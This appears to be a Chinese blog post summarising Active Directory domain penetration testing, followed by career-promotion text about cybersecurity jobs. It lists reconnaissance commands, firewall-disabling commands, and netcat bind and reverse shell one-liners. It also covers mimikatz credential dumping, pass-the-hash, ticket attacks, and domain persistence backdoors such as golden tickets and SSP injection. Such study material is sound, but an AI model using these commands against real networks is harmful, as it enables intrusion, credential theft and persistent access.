木道寻08

这个屌丝很懒，什么也没留下！

热门标签

内网域渗透总结_域渗透知识

作者：木道寻08 | 2024-07-22 04:11:10

踩

域渗透知识

1.内网渗透测试基础知识

1.1 工作组

工作组中的所有计算机是对等的

1.2 域

域是一个有安全边界的计算机集合。用户想访问域内的资源，必须以合法的身份登录域，而用户对域内资源拥有什么样的权限，还取决于用户在域内的身份。

域控制器是域内一台类似管理服务器的计算机。DC负责所有连入的计算机和用户验证工作。域内所有用来验证身份的账号和密码散列值都保存在DC.所有的权限身份认证都在DC上进行。

一个域管理员只能管理本域，不能访问或者管理其他域。如果两个域之间需要相互访问，需要建立信任关系

域中的计算机是使用DNS来定位域控制器，服务器以及其他计算机，所以域的名字就是DNS域的名字。

1.3 活动目录

目录用于存储有关网络对象(例如用户，组，计算机，共享资源，打印机和联系人等)的信息。

活动目录相当于字典的索引，存储的是网络中所有资源的快捷方式

1.4 域控制器和活动目录的区别

如果内网中一台计算机安装了AD,它就变成了DC

1.5 域中计算机的分类

1.域控制器

2.成员服务器

安装了服务器操作系统并加入域，但没有安装活动目录的计算机。主要任务是提供网络资源（文件服务器，应用服务器等）

3.客户机

安装了其他其他操作系统的计算机，用户利用这些计算机和域中的账户就可以的登录域。这些计算机成为客户机

4.独立服务器

如果服务器既不加入域，也不安装活动目录，就称其位独立服务器。

1.6域内权限解读

1.域本地组

用于授予本域内资源的访问权限

2.全局组

单域用户访问多域资源，只能在创建该全局组的域中添加用户和全局组。

全局组和域本地组的关系，与域用户帐号和本地账号的关系类似。

3.通用组

通用组的成员来自域森林中任何域的用户账号，全局组和其他通用组，可以在该域森林中的任何域中指派权限，非常适合在域森林内的跨域访问。通用组的成员不是保存在各自的DC中，而是保存在全局编录中，任何变化都会导致全林复制。

域本地组来自于全林，作用于本域，全局组来自本域，作用于全林，通用组来自全林，作用于全林。

域本地组权限：

1.管理员组（Administrators）的成员可以不受限制地存取计算机/域地资源。

2.其他

几个重要地全局组，通用组地权限。

1.域管理员组（Domain Admins ）的成员在所有加入域的服务器，域控制器和活动，目录中均默认拥有完整的管理员权限。这个组会被添加到自己所在域的Administrators组中，因此可以继承Administrators组的权限。同时默认会被添加到域中每台计算机的本地Administrators组。

2.企业系统管理员组是域森林根域中的一个组。该组在域森林中的每个域内都是Administrators组的成员。

3.域用户组（Domain Users）中所有的域成员。在默认情况下，任何由我们建立的用户账号都属于Domain User组。

2.内网信息收集

2.1 收集本机信息

1.查询网络配置信息

ipconfig /all

2.查询操作系统和版本信息

systeminfo | findstr /B /C:"OS NAME" /C:"OS Version"

(2)查询安全的软件及版本，路径等

wmic product get name,verison

3.查询本机服务信息

wmic service list brief

4.查询进程列表

tasklist
wmic process list brief

5.查看启动程序信息

wmic startup get command,caption

6.查看计划任务

schtasks /query /fo LIST /v

7.查看主机开机时间

net statistics workstation

8.查询用户列表

net user

(2)获取本地管理员(通常包含域用户)信息

net localgroup administrators

(3)查看在线用户

query user || qwinsta

9.列出或断开本地计算机与所连接的客户端之间的会话

net session

10.查询端口列表

netstat -ano

11.查看补丁信息

systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn

12.查看主机共享列表

net share
wmic share get name,path,status

13.查询路由表以及所有可用接口的Arp缓存表

route print
arp -a

14.查询防火墙相关配置

(1)关闭防火墙

--2003 及以前
netsh firewall set opmode disable
--2003 以后
netsh advfirewall set allprofiles state off

(2)查看防火墙配置

netsh firewall show config

15.查看代理配置情况

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

2.2 查询当前权限

1.查看当前权限

whoami

除普通用户外，所有的机器都有一个机器用户(用户名是机器名加上“$”)。在本质上，机器的system用户对应的就是域里面的机器用户。所以，使用System权限可以运行域内的查询命令.(Administrators权限可以直接提升为System权限)

2.获取SID

whoami /all

3.查询指定用户的详细信息

net user /domain

2.3判断是否在域

ipconfig /all --看DNS后缀列表，使用nslookup反向解析，判断域控制器和DNS服务器是否在同一台机器上
systeminfo    --查看“域”
net config workstation --看"工作域站"
net time /domain --判断主域，域服务器通常会作为时间时间服务器使用

2.4收集域内基础信息

1.查询域

net view /domain

2.查询域内所有计算机

net view /domain:XXX

3.查询域内计算机列表

net group /domain

4.查询所有域成员计算机列表

net group "domain computers" /domain

5.获取域密码信息

net accounts /domain

6.获取域信任信息

nltest /domain_trusts

2.5 查找域控

1.查看当前时间

net time /domain --通常时间服务器为主域控制器

2.查看域控制器组

net group "Domain Controllers" /domain

3.获取域控列表

nltest /DCLIST:XXX

2.6 查询域内用户和管理员信息

1.查询所有域用户列表

(1)向域控制器进行查询
net user /domain
(2) 获取域内用户的详细信息
wmic useraccount get /all
(3)查看存在的用户
dsquery user
(4)查询本地管理员组
net localgroup adminstrators

2.查询域管理员用户

net group "Domian admins" /domain
net group "Enterprise Admins" /domain

3.隐藏通信隧道技术

3.1隧道基础知识

网络层： IPV6隧道，ICMP隧道，GRE隧道
传输层:  TCP隧道，UDP隧道，常规端口转发
应用层：SSH隧道，HTTP隧道，HTTPS隧道，DNS隧道

3.2 网络层隧道

IPV6隧道

通过IPV4隧道传送IPV6数据报文的技术。将IPV6报文整体封装到IPV4数据报文中。

3.3传输层隧道

1.nc

(1)正向shell
nc -lvp 4444 -e /bin/bash                   //LINUX
nc -lvp 4444 -e c:\windows\system32\cmd.exe   //Windows

nc 192.168.1.11 4444
靶机监听本地4444端口，接收到请求重定向到shell
(2)反向shell
nc -e /bin/bash Lhost port   //target
nc -lvvp port               //hacker

3.4应用层隧道

1.本地转发

-C 压缩数据

-f 后台运行

-N 静默连接

-g 允许远程主机连接本地用于转发的端口

-L 本地端口转发

-R 远程端口转发

-D 动态转发（socks代理）

-P 指定SSH端口

ssh -CfNg LPORT:RHOST:RPORT //跳板机
root@192.168.1.11(跳板机) // hacker

2.远程转发

ssh -SfNg -R LPORT(攻击机端口):RHOST:RPORT //跳板机
root@LPORT   //跳板机

远程端口转发是在远程主机上监听一个端口，将所有访问远程服务器指定端口的数据都会通过SSH隧道传输到本地的对应端口

3.动态转发

ssh -CfNg -D 7000  root@192.168.1.11(跳板机)

4.权限维持

1.windows权限

(1)user

(2)Adminstrator

(3)System 系统权限，可以对SAM等敏感文件进行读取

(4)TrustsedInstaller 最高权限可以修改系统文件

2.系统内核溢出漏洞提权分析

3.windows配置错误利用

（1）windows允许低权限用户以System权限运行安装文件

（2）可信任服务路径（包含空格且没有引号的路径）

系统在解析文件路径时，会以系统权限进行。

（3）自动安装配置文件（包含敏感信息）

4.组策略首选项提权分析

SYSVOL是活动目录中一个用来存储公共文件服务器副本的共享文件夹，在域中的所有域控制器之间进行复制。

可以在经过身份验证的域用户或者域信任用户具有读权限的活动目录的域范围内共享。

（1）获取组策略凭据

找到cpassword的xml文件（私钥已公布）

5.UAC提权

6.无凭证条件下的权限获取

（1）LLMNR(本地链路多播解析)欺骗

局域网中的DNS服务器不可用时，DNS客户端会使用LLMNR解析本地网段中的机器名称

（2）NetBIOS

一种网络协议，根据NetBIOS协议广播获得计算机名称，并解析为相应的IP地址

5.域内横向移动分析及防御

1.IPC

为了实现进程间通信而开放的命名管道

通过IPC$可以与目标机器建立连接

条件：

（1）开启139（NetBIOS），445(共享文件)端口

（2）开启默认共享

2.获取远程主机信息

(1)dir命令

(2)tasklist

3.windows系统散列值获取分析

(1) LM Hash(本质是DES)和NTLM HASH(MD4)

(2) 密码抓取

lsass.exe 进程用于实现Windows的安全策略。可以使用工具将散列值和明文密码从lsass.exe或SAM文件中导出

(3)mimikatz 使用

lsadump::sam
sekurlsa::logonpasswords (Wdigest关闭 导致无法抓取明文密码)

(4)防范

将具有Debug权限的本地管理员从administrators组中删除

关闭wdigest

安装kb2871997(仍需禁用默认的Administrators账号)

加入”Protected Users“全局安全组

4.哈希传递攻击

1.前提

用户登录计算机使用的大都是域账号，大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号和密码也是相同的，就可以使用hash传递登录内网中的其他计算机。

2.NTLM Hash传递

3.AES-256密钥进行传递

5.票据传递攻击

PTT（Pass The Ticket）

注：（1）dir务必使用主机名，使用IP地址，会导致错误。

（2）票据文件注入内存的默认有效时间为10小时。

（3）不需要提供mimikatz本地管理员权限

1.Psexec

通过命令行环境与目标机器进行连接

注：需要远程系统开启amdin$共享（默认开启）

使用ipc$连接目标系统后，不需要输入账号密码

使用psexec执行远程命令时，会在目标系统中创建一个psexec服务。命令执行后，psexec服务将自动删除。创建或删除会产生大量日志，可以在溯源的时候通过日志反推攻击流程。

使用psexec可以直接获得System权限的交互式shell

2.metasploit中的psexec模块

3.WMI的使用

wmic命令没有回显，需要使用ipc$和type命令来读取信息。

4.smbexecd的使用

smbexec可以通过文件共享（admin$,c$,ipc$,d$）在远程系统中执行命令。

6.域控制器安全

1. 使用卷影拷贝服务提取ntds.dit

在活动目录中所有的数据都存在ntds.dit中。其是一个二进制文件，包含用户名，散列值，组，GPP,OU等与活动目录相关的信息。和SAM文件一样，是被windows操作系统锁定的。

可以利用卷影拷贝服务可以实现这些操作相当于快照，只要用于备份和恢复

2.使用dcsync获取域散列值

mimakatz的dcsync可以利用卷影拷贝服务直接提取ntds.dit文件并检索域散列值。

3.Kerberos域用户提权漏洞分析与防范

漏洞产生原因：用户在向Kerberos密钥分发中心（KDC）申请TGT时，可以伪造自己的kerberos票据。如果票据声明自己有域管理员权限，而KDC在处理该票据时未验证票据的签名。那么，返给用户的TGT就使普通域用户拥有了域管理员权限。该用户可以将TGT发送到KDC,KDC的TGS在验证TGT后，将服务Service Ticket发送给该用户，而用户拥有该服务的权限，从而使攻击者可以访问域内的资源。

7.跨域攻击分析

1.哈希传递攻击

2.票据传递攻击

3.利用信任关系进行跨域攻击

8.域控制器持久化分析

1.DSRM域后门

DSRM(Directory Services Restore Mode,目录服务恢复模式) 是Windows域环境中域控制器的安全模式启动选项。可以允许管理员在域环境中出现故障或崩溃时还原，修复，重建活动目录数据库，是域环境的运行恢复正常。可以使用KB961320对指定域账号的密码对DSRM的密码进行同步。就可以利用DSRM账号作为一个域控制器管理员，控制域控。

2.SSP维持域控权限

SSP就是一个DLL文件，主要用来实现Windows操作系统的身份认证功能。

系统启动时，SSP将被加载到lsass.exe进程中。加入攻击者对LSA进行了扩展，自定义了恶意DLL文件，注入到

lsass.exe中，就可以获取其中的明文密码。

3.SID History域后门

SID History的作用是在域迁移过程中保持域用户的访问权限，是迁移后的用户保持原有的权限，能够访问其原来可以访问的资源。如果获得了域管理员权限，就可以将管理员的SID添加到恶意用户test的SID History属性中。

4.黄金票据

krbtgt是KDC服务使用的账号，属于Domian Admins组，每个账号的凭据都是由krbtgt生成的，如果拿到了他的NTLM HASH 或者 AES-256,就可以伪造域内任意用户身份。

使用黄金票据伪造的用户可以是任意用户。因为只要TGT被kbrtgt账号和密码正确的加密，那么任意KDC使用krbtgt解密后TGT中的所有信息都是可信的。

5.白银票据

伪造的是TGS,依赖于服务账号的密码散列值。

题外话

初入计算机行业的人或者大学计算机相关专业毕业生，很多因缺少实战经验，就业处处碰壁。下面我们来看两组数据：

2023届全国高校毕业生预计达到1158万人，就业形势严峻；
国家网络安全宣传周公布的数据显示，到2027年我国网络安全人员缺口将达327万。

一方面是每年应届毕业生就业形势严峻，一方面是网络安全人才百万缺口。

6月9日，麦可思研究2023年版就业蓝皮书（包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》）正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中，本科计算机类专业起薪与2021届基本持平，高职自动化类月收入增长明显，2022届反超铁道运输类专业（5295元）排在第一位。

具体看专业，2022届本科月收入较高的专业是信息安全（7579元）。对比2018届，电子科学与技术、自动化等与人工智能相关的本科专业表现不俗，较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼，已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。

“没有网络安全就没有国家安全”。当前，网络安全已被提升到国家战略的高度，成为影响国家安全、社会稳定至关重要的因素之一。

网络安全行业特点

1、就业薪资非常高，涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万！

2、人才缺口大，就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表：我国网络空间安全人才需求140万人，而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W，现在从事网络安全行业的从业人员只有10W人。

行业发展空间大，岗位非常多

网络安全行业产业以来，随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性，尤其是掌握工作中的核心网络架构、安全技术，在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升，所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟，升值空间一路看涨，这也是为什么受大家欢迎的主要原因。

从某种程度来讲，在网络安全领域，跟医生职业一样，越老越吃香，因为技术愈加成熟，自然工作会受到重视，升职加薪则是水到渠成之事。